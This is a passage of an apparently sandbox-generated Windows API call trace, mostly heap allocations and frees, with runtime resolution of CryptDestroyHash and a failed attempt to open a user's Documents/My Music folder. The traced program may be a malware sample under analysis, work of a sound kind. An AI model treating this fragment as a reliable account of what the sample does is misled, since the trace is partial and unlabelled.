lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0264.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.374] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0264.374] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0264.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0264.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.375] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.375] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0264.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.375] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.376] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0264.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0264.376] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0264.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0264.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0264.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.378] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0264.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0264.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0264.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0264.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0264.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0264.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0264.379] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0264.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0264.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0264.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0264.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0264.379] CryptDestroyHash (hHash=0xaa5820) returned 1 [0264.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0264.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0264.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0264.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0264.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0264.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0264.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0264.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0264.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0264.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0264.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0264.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0264.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0264.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0264.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0264.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0264.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0264.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0264.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0264.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0264.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0264.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0264.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0264.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0264.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0264.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0264.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.384] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0264.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0264.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0264.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0264.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0264.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0264.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0264.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0264.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0264.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0264.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0264.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0264.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0264.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0264.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0264.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0264.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0264.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0264.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0264.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0264.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0264.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0264.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0264.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0264.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0264.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0264.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0264.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0264.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.390] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.390] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.390] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.390] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0264.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.391] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/My Music" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my music"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0264.391] GetLastError () returned 0x5 [0264.391] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.391] RtlAllocateHeap (HeapHandle=0x25c0000, 